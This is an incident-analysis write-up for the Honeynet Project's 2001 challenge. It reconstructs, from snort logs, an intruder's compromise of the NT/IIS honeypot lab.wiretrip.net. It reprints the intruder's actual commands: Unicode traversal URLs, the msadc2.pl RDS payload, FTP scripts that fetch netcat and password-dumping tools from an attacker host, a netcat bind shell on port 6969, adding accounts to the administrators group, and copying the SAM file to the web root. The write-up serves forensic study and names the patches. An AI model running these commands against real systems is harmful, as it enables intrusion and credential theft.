Jon McKnight
jmcknight@kpmg.com
The Challenge:
On 4 Feb. 2001, the system 213.116.251.162 successfully attacked and compromised the honeypot 172.16.1.106, otherwise known as lab.wiretrip.net. We have reason to believe that the attacker knew this was a honeypot, however we decided to release this challenge as it examplifies the most common of NT attacks found in the wild. Your only source of information is the snort binary log file that captured the entire attack. You can download this in (.gz format, MD5=af1588ce7f7798190694addef3f148f7), or (.zip format, MD5=aca62e19ba49546d2bfd1fa1c71b5751). You will have to extract and analyze the information from this binary log file. Remember, entries will not only be judge on your answers, but how easy they are to read, and if you show how you obtained/conducted your analysis.
1.Which exploit(s) were used to attack the system?
Unicode and RDS
2.How were the exploits used to access and control the
system?
First he verified that it was Unicode vulerable then RDS. He tried to use RDS to create an ftp file that contained username, password and files (pdump.exe, samdump.exe, and nc.exe) that he wanted to download from a remote server. Everything worked correctly except that he had the wrong password for the ftp server. He could not see this so he assumed something was wrong.
He attempts an ftp connection to his own machine, this works. Next he tried to create and execute the ftp file via Unicode and it worked. Now he used Unicode to issue a command to the lab.wiretrip.net box to copy cmd.exe and rename it cmd1.exe. Then he used Unicode to bind cmd.exe to port 6969 with netcat. I am somewhat puzzled why he did this through Unicode as netcat will only be running as IUSR_machine. It would have been much less time consuming to use RDS to issue the netcat command.
3.What was done once
access was gained?
Johna used RDS to issue the pdump command. The output was piped to a file. This did not work however. At this time Johna also had an IUSER_machine level connection to lab.wiretrip.net via netcat. He issued a net users command via RDS, piped the output to a file and then viewed the contents via his Unicode netcat connection. He then adds a README.NOW.Hax0r file in an effort to alert the admin to patch the server.
Next Johna attempts to add the IUSR_Kenny account and the IWAM_Kenny account to the admin group. This will give Johna’s Unicode netcat connection administratives rights and allow him to view things like the sam._ file.
Now that his netcat connection is admin level he issues the net start command to see what services are running. Johna now attempts to add a user called testuser with the password UgotHacked. He is unsuccessful so he decides to update the sam._ file (using rdisk). He first tried this command from the netcat connection but that did not seem to work so he tries RDS. After a few tries it seems to work. Once the file is updated he then copies it to the C:\ dir into a file called har.txt. He loses his connection and reconnects. After verifying that the file has been successfully copied he then copies har.txt to wwwroot and views har.txt from his web browser. It is safe to assume that he copies the file into L0phtCrack and starts cracking the administrator password.
Twelve minutes later the gig is up, Johna figures out it is a honeypot. My guess is that the administrator’s password has been cracked and it gives him his clue. I would add that clue to the fact that one of RFP’s boxes is vulnerable to two exploits that he has received much press for (creating the msadc2.pl script and researching Unicode).
He changes IWAM_Kenny’s password to Snake69Snake69. He deletes har.txt from the wwwroot directory and apparently tells his friends on IRC to check out a box that he has hacked. This would flood the snort log (which it has done) and make it harder to sift through the data. I think he has mentioned that it is both Unicode and RDS vulnerable because a different box connects. This Linux box creates a file called test.txt using RDS. The contents of the file are “this can’t be true”.
I notice a bunch of different connections looking at the test.txt. This provides more evidence to the fact that he is communicating with friends over IRC. The Linux box seems to have told everyone else.
Johna creates a new ftp file, this time he wants to have lab.wiretrip.net send him whisker.tar.gz. While Johna was getting whisker, another nc connection was made to lab.wiretrip.net. It is possible this is Johna reconnecting, but at this point we cannot verify with the data that we have since we know other people are aware of the vulnerabilities.
Johna’s last action before the snort log ends is to delete the ftp file that he placed on the server earlier.
4.How could this
attack been prevented?
Applying the patches for Unicode and RDS
MS00-057 ("File permission canonicalization") for Unicode
http://www.microsoft.com/security/bulletins/MS99-025faq.asp for RDS
5.How much time did
you spend on this analysis and writeup?
14 hours
Bonus Question:
Do you feel that the
attacker in question knew if this was a honeypot? If so, why or why not?
Yes
At approximately 13:23 GMT Johna issues the following command
echo best honeypot
i've seen till now :) > rfp.txt
It seems he has figured out this was a honeypot. One of the most obvious reasons to me would be that lab.wiretrip.net is vulnerable to an exploit (RDS) that it's owner (RFP) developed. RFP also researched the Unicode exploit. I don't think it became apparent to Johna until around the time he issued the honeypot quote. I say this because he makes some other files like
Johna realized this was a honeypot after he had copied the current password file. It is possible that he cracked the password for the users on lab.wiretrip.net and one of the cracked passwords may have tipped him off.
Looks like they first tried Unicode to view the boot.ini file. It seems they used a script to automatically check for this vulnerability. There are so many out in the wild I have no idea which exact script.
GET
/guest/default.asp/..%C0%AF../..%C0%AF../..%C0%AF../boot.ini HTTP/1.1
GET
/guest/default.asp/..À¯../.../..%C0%AF../..%C0%AF../boot.ini HTTP/1.1
GET
/guest/default.asp/..À¯../..À¯../..%AF../..%C0%AF../boot.ini HTTP/1.1
GET
/guest/default.asp/..À¯../..À¯../..À¯../boot.ini HTTP/1.1
It seems the box is vulnerable. Success at 12:24:18
HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Sun, 04 Feb 2001 12:24:18 GMT
Content-Type: text/html
Cache-control: private
Transfer-Encoding: chunked
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINNT
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINNT="Windows
NT Server, Enterprise Edition Version 4.00"
multi(0)disk(0)rdisk(0)partition(1)\WINNT="Windows
NT Server, Enterprise Edition Version 4.00 [VGA mode]" /basevideo
/sos
GET /msadc/ HTTP/1.1
Accept: image/gif, image/x-xbitmap,
image/jpeg, image/pjpeg, application/vnd.ms-excel, application/msword,
application/vnd.ms-powerpoint, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE
5.01; Windows NT 5.0; Hotbar 2.0)
Host: lab.wiretrip.net
Connection: Keep-Alive
Cookie:
ASPSESSIONIDGQQGGQZK=KPGNFIPAKMIDBOCJNGOAAHBD
HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/4.0
Date: Sun, 04 Feb 2001 12:25:31 GMT
Connection: close
Content-Type: text/html
Content-Length: 172
A professor once told me that written code is like a fingerprint. Looking at the snot log and then looking at the code in msadc2.pl I know that the snort log is showing me msadc2.pl being run.
Snort Log:
ADCClientVersion:01.06
Content-Type: multipart/mixed;
boundary=!ADM!ROX!YOUR!WORLD!; num-args=3
--!ADM!ROX!YOUR!WORLD!
Content-Type: application/x-varg
Content-Length: 366
msadac2.pl snippet:
ADCClientVersion:01.06
Content-Type: multipart/mixed;
boundary=!ADM!ROX!YOUR!WORLD!; num-args=3
--!ADM!ROX!YOUR!WORLD!
Content-Type: application/x-varg
Content-Length: $reqlen
First the intuder tests to see if the exploit works. He creates a file called fun with the word "werd" in it, in the C:\ directory.
c m d
/ c e c h o w e r d
> > c : \ f u n
Date: Sun, 04 Feb 2001 12:26:03 GMT
Now the inrtuder checks to see if the file has been created. The intruder uses the Unicode vulnerability to check. Looking at this signature again verifies that the intruder is using a Unicode script (well it doesn't verify 100%, but I have great certainty).
GET
/guest/default.asp/..%C0%AF../..%C0%AF../..%C0%AF../fun HTTP/1.1
GET
/guest/default.asp/..À¯../.../..%C0%AF../..%C0%AF../fun HTTP/1.1
GET
/guest/default.asp/..À¯../..À¯../..%AF../..%C0%AF../fun HTTP/1.1
GET /guest/default.asp/..À¯../..À¯../..À¯../fun HTTP/1.1
It seems the file is there because "werd" is printed out below. This means the server is vulnerable to RDS.
HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Sun, 04 Feb 2001 12:26:11 GMT
Content-Type: text/html
Cache-control: private
Transfer-Encoding: chunked
werd
c m d / c e c h o
u s e r j o h n a 2 k >
f t p c o m
Date: Sun, 04 Feb 2001 12:31:47 GMT
c m d / c e c h o
h a c k e r 2 0 0 0 >
> f t p c o m
Date: Sun, 04 Feb 2001 12:31:54 GMT
c m d / c e c h o
g e t s a m d u m p . d l
l > > f t p c o m
Date: Sun, 04 Feb 2001 12:32:01 GMT
c m d / c e c h o
g e t p d u m p . e x e > >
f t p c o m
Date: Sun, 04 Feb 2001 12:32:08 GMT
c m d / c e c h o
g e t n c . e x e > >
f t p c o m
Date: Sun, 04 Feb 2001 12:32:15 GMT
c m d / c e c h o
q u i t > > f t p c o m
Date: Sun, 04 Feb 2001 12:32:22 GMT
Now the intruder wants to tell the server to ftp to another box that has the files that the intruder needs. In this case the
server the intruder wants to ftp to is www.nether.net.
c m d / c f t p
- s : f t p c o m - n w w w . n e t h e r . n e t
Date: Sun, 04 Feb 2001 12:32:29 GMT
Doh! The intruder had a bad login.
220 freenet.nether.net FTP server (SunOS 5.7) ready.
USER johna2k
331 Password required for johna2k.
PASS hacker2000
530 Login incorrect.
PORT 172,16,1,106,12,64
530 Please login with USER and PASS.
RETR samdump.dll
530 Please login with USER and PASS.
RETR pdump.exe
530 Please login with USER and PASS.
RETR nc.exe
530 Please login with USER and PASS.
QUIT
221 Goodbye.
Not realizing that the FTP failed the intruder issues a command to run pdump and save the results in a file called new.pass.
After creating this file the intruder wants the server to ftp this file to the intruder's server at www.nether.net
c m d / c p d u m p . e x e > > n e w . p a s
s
Date: Sun, 04 Feb 2001 12:32:46 GMT
c m d / c e c h o
u s e r j o h n a 2 k >
f t p c o m 2
Date: Sun, 04 Feb 2001 12:32:56 GMT
c m d / c e c h o
h a c k e r 2 0 0 0 >
> f t p c o m 2
Date: Sun, 04 Feb 2001 12:33:03 GMT
c m d / c p u t
n e w . p a s s > > f t p c o m 2
Date: Sun, 04 Feb 2001 12:33:10 GMT
c m d / c e c h o
q u i t > > f t p c o m 2
Date: Sun, 04 Feb 2001 12:33:17 GMT
c m d / c f t p
- s : f t p c o m 2 - n w w w . n e t h e r . n e t
Date: Sun, 04 Feb 2001 12:33:24 GMT
Doh!Doh! Bad login again, but the intruder still does not know.
220 freenet.nether.net FTP server (SunOS 5.7) ready.
USER johna2k
331 Password required for johna2k.
PASS hacker2000
530 Login incorrect.
QUIT
221 Goodbye.
c m d
/ c f t p 2 1 3 . 1 1 6 . 2 5 1 . 1 6 2
Date: Sun, 04 Feb 2001 12:33:43 GMT
The intruder (Johna) connects to his server,
--------H-A-C-K T-H-E P-L-A-N-E-T--------
220-W3|_c0m3 T0 JohnA's 0d4y Ef-Tee-Pee
S3rv3r.
220-Featuring 100% elite hax0r warez!@$#@
220-Im running win 95 (Release candidate 1),
on a p33, with 16mb Ram.
220 -------H-A-C-K T-H-E P-L-A-N-E-T--------
GET
/msadc/..%C0%AF../..%C0%AF../..%C0%AF../program%20files/common%20files/system/msadc/cmd1.exe?/c+echo+open+213.116.251.162+>ftpcom
HTTP/1.1
Looks like this way works.
220--------H-A-C-K
T-H-E P-L-A-N-E-T--------
220-W3|_c0m3 T0 JohnA's 0d4y Ef-Tee-Pee S3rv3r.
220-Featuring 100% elite hax0r warez!@$#@
220-Im running win 95 (Release candidate 1), on a p33, with 16mb
Ram.
220 -------H-A-C-K
T-H-E P-L-A-N-E-T--------
USER johna2k
331 User name okay, need password.
PASS haxedj00
230 User logged in, proceed.
PORT 172,16,1,106,12,71
200 PORT Command successful.
RETR nc.exe
150 Opening ASCII mode data connection for nc.exe (59392 bytes).
Issues a command to copy cmd.exe to cmd1.exe using Unicode.
/msadc/..À¯../.../..%C0%AF../..%C0%AF../winnt/system32/cmd.exe?/c+copy+C:\winnt\system32\cmd.exe+cmd1.exe
HTTP/1.1
Now he tells netcat to bind cmd.exe to port 6969
GET /msadc/..%C0%AF../..%C0%AF../..%C0%AF../program%20files/common%20files/system/msadc/cmd1.exe?/c+nc+-l+-p+6969+-e+cmd1.exe
Success. NOTE: he is connected as IUSR not Administrator
Microsoft(R) Windows NT(TM)
(C) Copyright 1985-1996 Microsoft Corp.
C:\Program Files\Common Files\system\msadc>
Now he looks to see if his files are there:
02/04/01 06:41a <DIR> .
02/04/01 06:41a <DIR> ..
09/25/97 07:41a 596 adcjavas.inc
09/25/97 07:41a 589 adcvbs.inc
04/30/97 11:00p 208,144 cmd1.exe
02/04/01 06:41a 98 ftpcom
09/25/97 08:28a 172,816 msadce.dll
09/25/97 08:16a 5,632 msadcer.dll
09/25/97 08:24a 23,312 msadcf.dll
09/25/97 08:24a 91,408 msadco.dll
09/25/97 08:19a 5,120 msadcor.dll
09/26/97 08:19a 42,256 msadcs.dll
02/04/01 06:41a 59,392 nc.exe
02/04/01 06:41a 32,768 pdump.exe
10/02/97 07:28a 19,388 readme.txt
02/04/01 06:41a 36,864 samdump.dll
16
File(s) 698,383 bytes
1,690,861,056 bytes free
C:\Program Files\Common Files\system\msadc>
pdump and samdump are there. So is cmd1.exe (which he copied earlier) and ftpcom.
Johna is excited so now he executes pdump using RDS and saves the output to a file called "yay.txt"
c m d
/ c C : \ P r o g r a m F i l e s \ C o m m o n F i l e s \ s y s t e m \ m s a d c \ p d u
m p . e x e > > y a y . t x t
Date: Sun, 04 Feb 2001 12:42:48 GMT
He deletes ftpcom and realizes that he needs to put the full path of pdump
c m d
/ c C : \ P r o g r a m F i l e s \ C o m m o n F i l e s \ s y s t e m \ m s a d c \ p d u
m p . e x e > > c : \ y a y . t x t
Date: Sun, 04 Feb 2001 12:43:32 GMT
That didn't work so he looks around the c:\ directory of lab.wiretrip.net.
He issues a net users command via RDS and pipes the output to heh.txt.
c m d / c n e t
u s e r s > > c : \ h e h
. t x t
Date: Sun, 04 Feb 2001 12:48:55 GMT
Using his Unicode netcat connection he checks to see if the file is there.
dir
Volume in drive C has no label.
Volume Serial Number is
8403-6A0E
Directory of C:\
11/26/00 12:34p 0 AUTOEXEC.BAT
11/26/00 06:57p 322 boot.ini
12/26/00 07:36p <DIR> exploits
02/04/01 06:48a 263 heh.txt
12/07/00 03:30p <DIR> InetPub
12/07/00 03:12p <DIR> Multimedia Files
12/26/00 07:10p <DIR> New Folder
01/26/01 02:10p 78,643,200 pagefile.sys
12/21/00 08:59p <DIR> Program Files
12/21/00 08:59p <DIR> TEMP
02/04/01 06:48a <DIR> WINNT
12/26/00 07:09p <DIR> wiretrip
02/04/01 06:43a 0 yay.txt
14
File(s) 78,643,785 bytes
1,690,861,056 bytes free
Now he issues the type command via his Unicode netcat connection to see the contents of heh.txt
User accounts for \\
-------------------------------------------------------------------------------
Administrator
Guest
IUSR_KENNY
IWAM_KENNY
The command completed with one or more errors.
He is kind enough to leave a file for the admin called README.NOW.Hax0r
echo Hi, i know that this a is a lab server, but patch
the holes! :-) >>README.NOW.Hax0r
He tries to add IWAM_KENNY to localgroup as a domain admin
c m d
/ c n e t l o c a l g r o u p D o m a i n A d m i n s I U S R _ K
E N N Y / A D D
Date: Sun, 04 Feb 2001 12:52:58 GMT
After a couple of unsuccessful tries he is able to add IUSR_KENNY and IWAM_KENNY as domain admins.
c m d
/ c n e t l o c a l g r o u p a d m i n i s t r a t o r s I U S R _ K E N N Y / A D D
Date: Sun, 04 Feb 2001 12:55:00 GMT
c m d / c n e t l o c a l g r o u p a d m i n i s t r a t o r s I W A M _ K E N N Y / A D D
Date: Sun, 04 Feb 2001 12:55:12 GMT
Issuing the 'net localgroup administrators' command he is able to see that that IUSR_KENNY and IWAM_KENNY are now both admins.
Alias name administrators
Comment Members can fully administer the computer/domain
Members
-------------------------------------------------------------------------------
Administrator Domain Admins IUSR_KENNY
IWAM_KENNY
The command completed successfully.
net start
These Windows NT services are started:
Alerter
Computer Browser
EventLog
FTP Publishing Service
IIS Admin Service
License Logging
Service
Messenger
MSDTC
Net Logon
NT LM Security Support
Provider
Plug and Play
Protected Storage
Remote Procedure Call
(RPC) Locator
Remote Procedure Call
(RPC) Service
Server
Spooler
TCP/IP NetBIOS Helper
Workstation
World Wide Web
Publishing Service
The command completed successfully.
Now he tries to add a user name testeruser with the password UgotHacked.
c m d
/ c n e t u s e r
t e s t u s e r U g o t H a c k
e d / A D D
Date: Sun, 04 Feb 2001 12:57:58 GMT
Next he tries to make testuser a member of localgroup and tries to make him an administrator.
c m d
/ c n e t l o c a l g r o u p A d m i n i s t r a t o r s t e s t u s e r / A D D
Date: Sun, 04 Feb 2001 12:58:13 GMT
But these commands did not work and he spends some time trying to find out why. He gives u.
He goes to the winnt repair directory and issues the rdisk command to update the sam._ file.
c m d / c
r d i s k - / s
Date: Sun, 04 Feb
2001 13:05:27 GMT
c m d / c
r d i s k - s
Date: Sun, 04 Feb
2001 13:05:33 GMT
c m d / c
r d i s k
Date: Sun, 04 Feb
2001 13:05:38 GMT
Using netcat he checks to see if the sam._ file has been update. The file’s date has not changed which means the file has not been updated.
dir
Volume in drive C has no label.
Volume Serial Number is 8403-6A0E
Directory of C:\WINNT\repair
02/04/01 07:05a <DIR>
.
02/04/01 07:05a <DIR>
..
02/04:}Sä
10/13/96 07:38p 438 autoexec.nt
11/26/00 12:34p 2,510 config.nt
11/26/00 06:43p 15,677 default._
11/26/00 06:43p 14,946 ntuser.da_
11/26/00 06:43p
4,593 sam._
11/26/00 06:43p 6,066 security._
11/26/00 06:54p 50,405 setup.log
11/26/00 06:43p 124,776 software._
11 File(s) 1,046,803 bytes
1,690,111,488 bytes
free
He reissues the rdisk commands
c m d / c
r d i s k
Date: Sun, 04 Feb
2001 13:06:00 GMT
c m d / c
r d i s k - s /
Date: Sun, 04 Feb
2001 13:06:06 GMT
c m d / c
r d i s k / s –
Date: Sun, 04 Feb
2001 13:06:28 GMT
He checks to see if this worked. Sam._ has not been updated but ntuser.da_ has been updated. At least something is working.
dir
Volume in drive C has no label.
Volume Serial Number is 8403-6A0E
Directory of C:\WINNT\repair
02/04/01 07:06a <DIR> .
02/04/01 07:06a <DIR>
..
10/13/96 07:38p 438 autoexec.nt
11/26/00 12:34p 2,510 config.nt
11/26/00 06:43p 15,677 default._
02/04/01 07:06a 14,946 ntuser.da_
11/26/00 06:43p 4,593 sam._
11/26/00 06:43p 6,066 security._
11/26/00 06:54p 50,405 setup.log
02/04/01 07:05a 177,732 system._
11 File(s) 3,741,679 bytes
1,687,127,552 bytes free
Try, try, try again
c m d / c
r d i s k / s –
Date: Sun, 04 Feb 2001 13:06:46 GMT
Success! My guess is that this was the first time rdisk was run on this machine and it took a while to update. I think one of his original commands worked, but he wasn’t paient.
dir
Volume in drive C has no label.
Volume Serial Number is 8403-6A0E
Directory of C:\WINNT\repair
02/04/01 07:06a <DIR>
.
02/04/01 07:06a <DIR>
..
10/13/96 07:38p
438 autoexec.nt
11/26/00 12:34p 2,510 config.nt
11/26/00 06:43p 15,677 default._
02/04/01 07:06a 14,946 ntuser.da_
11/26/00 06:43p 4,593 sam._
11/26/00 06:43p 6,066 security._
11/26/00 06:54p 50,405 setup.log
02/04/01 07:05a 177,732 system._
11 File(s) 3,741,679 bytes
1,686,932,480 bytes
free
After he does this he uses type to copy the contents of the sam._ file into a file called har.txt.
c m d / c t y p e
c : \ w i n n t \ r e p a i r \ s a m . _ > > c : \ h a r . t x t
Date: Sun, 04 Feb 2001 13:07:32 GMT
He verifies the file is there
dir
Volume in drive C has no
label.
Volume Serial Number is
8403-6A0E
Directory of C:\
11/26/00 12:34p 0 AUTOEXEC.BAT
11/26/00 06:57p 322 boot.ini
11/26/00 12:34p 0 CONFIG.SYS
12/26/00 07:36p <DIR> exploits
02/04/01
07:07a 5,327
har.txt
12/07/00 03:30p <DIR> InetPub
12/07/00 03:12p <DIR> Multimedia Files
12/26/00 07:10p <DIR> New Folder
01/26/01 02:10p 78,643,200 pagefile.sys
12/21/00 08:59p <DIR> Program Files
02/04/01 06:49a 69 README.NOW.Hax0r
12/21/00 08:59p <DIR> TEMP
02/04/01 07:05a <DIR> WINNT
12/26/00 07:09p <DIR> wiretrip
02/04/01 06:43a 0 yay.txt
15
File(s) 78,648,918 bytes
1,689,455,616 bytes free
He then copied har.txt to wwwroot.
C:\InetPub\wwwroot>copy c:\har.txt
1 file(s) copied.
Next he views har.txt from his web browser (I assume he copies it to his machine and runs L0phtCrack).
GET /har.txt HTTP/1.1
Accept: image/gif, image/x-xbitmap,
image/jpeg, image/pjpeg, application/vnd.ms-excel, application/msword,
application/vnd.ms-powerpoint, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE
5.01; Windows NT 5.0; Hotbar 2.0)
Host: lab.wiretrip.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Sun, 04 Feb 2001 13:11:28 GMT
Content-Type: text/plain
Accept-Ranges: bytes
Last-Modified: Sun, 04 Feb 2001 13:07:33 GMT
ETag: "5063fd6fab8ec01:b85"
Content-Length: 5327
At approximately 13:23 GMT Johna issues the
following command
echo best honeypot i've seen till now :) > rfp.txt
It seems he has figured out this was a honeypot. One of the most obvious reasons to me would be that lab.wiretrip.net is vulnerable to an exploit (RDS) that it's owner (RFP) developed. RFP also researched the Unicode exploit.
After looking around for a while, Johna changes IWAM_KENNY's password to Snake69Snake69
c m d
/ c n e t u s e r
I W A M _ K E N N Y S n a k e 6
9 S n a k e 6 9
Date: Sun, 04 Feb 2001 13:33:07 GMT
echo this can't be true > test.txt
Then this person issues the type command to verify the data is in the file.
I dont think this is Johna b/c this person is running linux 2.4.1. I know that this is the person who created the test.txt file b/c they request that from their web browser.
GET /test.txt HTTP/1.0
If-Modified-Since: Sun, 04 Feb 2001 13:33:15 GMT; length=7
Connection: Keep-Alive
User-Agent: Mozilla/4.76 [en] (X11; U; Linux 2.4.1 i686)
Pragma: no-cache
Host: lab.wiretrip.net
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
image/png, */*
Accept-Encoding: gzip
Accept-Language: en
Accept-Charset: iso-8859-1,*,utf-8
HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Sun, 04 Feb 2001 13:34:58 GMT
Content-Type: text/plain
Accept-Ranges: bytes
Last-Modified: Sun, 04 Feb 2001 13:34:22 GMT
ETag: "f0eff02eaf8ec01:b85"
Content-Length: 21
Johna's web browser looks like this
GET /win2k.gif HTTP/1.1
Accept: */*
Referer: http://lab.wiretrip.net/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
If-Modified-Since: Sat, 16 Dec 2000 00:36:10 GMT
If-None-Match: "0796d2ff866c01:b85"
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0;
Hotbar 2.0)
Host: lab.wiretrip.net
Connection: Keep-Alive
Cookie: ASPSESSIONIDGQQGGQZK=LPGNFIPAECCHCHMAFOIKAOEB
GET /test.txt HTTP/1.1
Host: lab.wiretrip.net
Connection: keep-alive
Accept: image/gif, image/x-xbitmap,
image/jpeg, image/pjpeg, */*
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE
5.0; Windows 98; DigExt)
Via: 1.1 cache-haw (NetCache NetApp/5.0D13)
X-Forwarded-For: 194.117.146.52
HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Sun, 04 Feb 2001 13:37:06 GMT
Content-Type: text/plain
Accept-Ranges: bytes
Last-Modified: Sun, 04 Feb 2001 13:34:22 GMT
ETag: "f0eff02eaf8ec01:b85"
Content-Length: 21
this can't be true
Now here is another request from another box
GET /test.txt HTTP/1.0
User-Agent: Mozilla/4.7 [en] (Win98; I)
Accept: image/gif, image/x-xbitmap,
image/jpeg, image/pjpeg, image/png, */*
Accept-Encoding: gzip
Accept-Language: en
Accept-Charset: iso-8859-1,*,utf-8
Via: 1.0 cache3.estpak.ee:8080
(Squid/2.3.STABLE3)
X-Forwarded-For: 213.168.4.30
Host: lab.wiretrip.net
Cache-Control: max-age=259200
Connection: keep-alive
HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Connection: keep-alive
Date: Sun, 04 Feb 2001 13:37:15 GMT
Content-Type: text/plain
Accept-Ranges: bytes
Last-Modified: Sun, 04 Feb 2001 13:34:22 GMT
ETag: "f0eff02eaf8ec01:b85"
Content-Length: 21
this can't be true
Another request
GET /test.txt HTTP/1.1
Accept: image/gif, image/x-xbitmap,
image/jpeg, image/pjpeg, application/msword, */*
Accept-Language: nl
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE
4.01; Windows 95)
Host: lab.wiretrip.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Sun, 04 Feb 2001 13:38:07 GMT
Content-Type: text/plain
Accept-Ranges: bytes
Last-Modified: Sun, 04 Feb 2001 13:34:22 GMT
ETag: "f0eff02eaf8ec01:b85"
Content-Length: 21
this can't be true
Another request
GET /test.txt HTTP/1.0
Connection: Keep-Alive
User-Agent: Mozilla/4.61 [en] (X11; I; Linux
2.2.16 i686)
Host: lab.wiretrip.net
Accept: image/gif, image/x-xbitmap,
image/jpeg, image/pjpeg, image/png, */*
Accept-Encoding: gzip
Accept-Language: en
Accept-Charset: iso-8859-1,*,utf-8
HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Connection: keep-alive
Date: Sun, 04 Feb 2001 13:38:51 GMT
Content-Type: text/plain
Accept-Ranges: bytes
Last-Modified: Sun, 04 Feb 2001 13:34:22 GMT
ETag: "f0eff02eaf8ec01:b85"
Content-Length: 21
this can't be true
Another request
GET /test.txt HTTP/1.0
Host: lab.wiretrip.net
Accept: text/html, text/plain, text/sgml,
*/*;q=0.01
Accept-Encoding: gzip, compress
Accept-Language: en
User-Agent: Lynx/2.8.3rel.1 libwww-FM/2.14
HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Sun, 04 Feb 2001 13:41:54 GMT
Content-Type: text/plain
Accept-Ranges: bytes
Last-Modified: Sun, 04 Feb 2001 13:34:22 GMT
ETag: "f0eff02eaf8ec01:b85"
Content-Length: 21
Another request this time the language is French
GET /test.txt HTTP/1.1
Accept: */*
Accept-Language: fr
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE
5.5; Windows NT 5.0)
Host: lab.wiretrip.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Sun, 04 Feb 2001 13:43:39 GMT
Content-Type: text/plain
Accept-Ranges: bytes
Last-Modified: Sun, 04 Feb 2001 13:34:22 GMT
ETag: "f0eff02eaf8ec01:b85"
Content-Length: 21
this can't be true
There is no way Johna has this many boxes. The request times are very close together which makes me believe this is a coordinated effort. I would bet that he has informed his friends on IRC.
GET
/msadc/..À¯../..À¯../..%AF../..%C0%AF../program%20files/common%20files/system/msadc/cmd1.exe?/c+echo+put+c:\wiretrip\whisker.tar.gz+>>ftpcom
HTTP/1.1
Now he tells lab.wiretrip.net to ftp
220--------H-A-C-K T-H-E P-L-A-N-E-T--------
220-W3|_c0m3 T0 JohnA's 0d4y Ef-Tee-Pee
S3rv3r.
220-Featuring 100% elite hax0r warez!@$#@
220-Im running win 95 (Release candidate 1),
on a p33, with 16mb Ram.
220 -------H-A-C-K T-H-E P-L-A-N-E-T--------
USER johna2k
331 User name okay, need password.
PASS haxedj00
230 User logged in, proceed.
PORT 172,16,1,106,12,87
200 PORT Command successful.
STOR whisker.tar.gz
150 Opening ASCII mode data connection for
whisker.tar.gz.
226 Transfer complete.
QUIT
221 Buh bye, you secksi hax0r j00 :]
GET
/msadc/..%C0%AF../..%C0%AF../..%C0%AF../program%20files/common%20files/system/msadc/cmd1.exe?/c+nc+-l+-p+6969+-e+cmd1.exe
HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE
5.01; Windows NT 5.0; Hotbar 2.0)
Host: lab.wiretrip.net
Connection: Keep-Alive
Cookie: ASPSESSIONIDGQQGGQZK=LPGNFIPAECCHCHMAFOIKAOEB
GET
/msadc/..%C0%AF../..%C0%AF../..%C0%AF../program%20files/common%20files/system/msadc/cmd1.exe?/c+del+ftpcom
HTTP/1.1
EOF